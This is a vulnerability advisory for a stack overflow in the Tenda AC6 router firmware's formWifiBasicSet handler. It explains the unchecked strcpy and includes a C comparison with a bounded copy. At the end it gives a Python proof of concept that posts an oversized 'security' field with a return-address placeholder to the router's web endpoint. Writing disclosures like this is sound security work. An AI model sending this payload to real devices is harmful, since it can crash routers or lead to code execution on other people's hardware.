Overview

Affected version

AC6 V1.0 V15.03.05.16

Vulnerability details

The Tenda AC6 V1.0 V15.03.05.16 firmware has a stack overflow vulnerability in the formWifiBasicSet function. The v54 variable receives the security parameter from a POST request and is later copied into the s variable, a fixed 256-byte stack array. Because the user controls the value of security and no length check is performed, the statement strcpy(s, v54); can write past the end of s. A security value longer than the s array triggers the overflow.
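The copy pattern described above, shown beside a bounded version, as an added example that is not code from the advisory or from the Tenda firmware. The function and variable names (copy_security_unchecked, copy_security_bounded, handle_security_param, accepts_value_of_length) and the 256-byte buffer size are assumptions taken from the description; the hardened copy rejects any value that would not fit with its terminator instead of truncating it silently.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed stack buffer the advisory describes (assumed 256 bytes). */
#define SECURITY_BUF_LEN 256

/* The pattern the advisory describes: the POST field "security" is copied
   into a fixed-size stack array with strcpy() and no length check.
   Illustrative only; this is not the firmware's code. */
void copy_security_unchecked(char *s, const char *security)
{
    strcpy(s, security);   /* writes past s when strlen(security) >= 256 */
}

/* Hardened form: look for the terminator only inside the first s_len bytes,
   reject the value if none is found (it would not fit), then copy exactly
   the bytes that were checked. Returns 0 on success, -1 when rejected. */
int copy_security_bounded(char *s, size_t s_len, const char *security)
{
    const char *end = memchr(security, '\0', s_len);
    if (end == NULL) {
        return -1;         /* no room for the value plus '\0' */
    }
    size_t n = (size_t)(end - security);
    memcpy(s, security, n);
    s[n] = '\0';
    return 0;
}

/* Models the request handler: 1 if the value is accepted, 0 if rejected. */
int handle_security_param(const char *security)
{
    char s[SECURITY_BUF_LEN];
    return copy_security_bounded(s, sizeof s, security) == 0;
}

/* Builds a constructed value of `len` bytes of 'a' and runs it through the
   bounded handler, so the boundary can be checked without any overflow. */
int accepts_value_of_length(size_t len)
{
    char *value = malloc(len + 1);
    if (value == NULL) {
        return 0;
    }
    memset(value, 'a', len);
    value[len] = '\0';
    int accepted = handle_security_param(value);
    free(value);
    return accepted;
}

int main(void)
{
    printf("255-byte value accepted: %d\n", accepts_value_of_length(255));
    printf("256-byte value accepted: %d\n", accepts_value_of_length(256));
    printf("500-byte value accepted: %d\n", accepts_value_of_length(500));
    return 0;
}
```

The boundary is the interesting part: 255 bytes is the longest value that fits with its terminator, so the bounded copy accepts 255 and refuses 256 and anything longer, which is exactly the input the unchecked strcpy() would have written past the end of the array.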


PoC

import requests
from pwn import *

url = 'http://192.168.84.101/goform/WifiBasicSet'
# 500-byte "security" value, longer than the 256-byte stack buffer
payload = b'a' * 500 + p32(0xdeadbeef)
data = {
    'security_5g': '1',
    'hideSsid': '1',
    'ssid': '1',
    'security': payload,
    'wrlPwd': '1',
    'hideSsid_5g': '1',
    'ssid_5g': '1',
    'wrlPwd_5g': '1'}
requests.post(url, data=data)
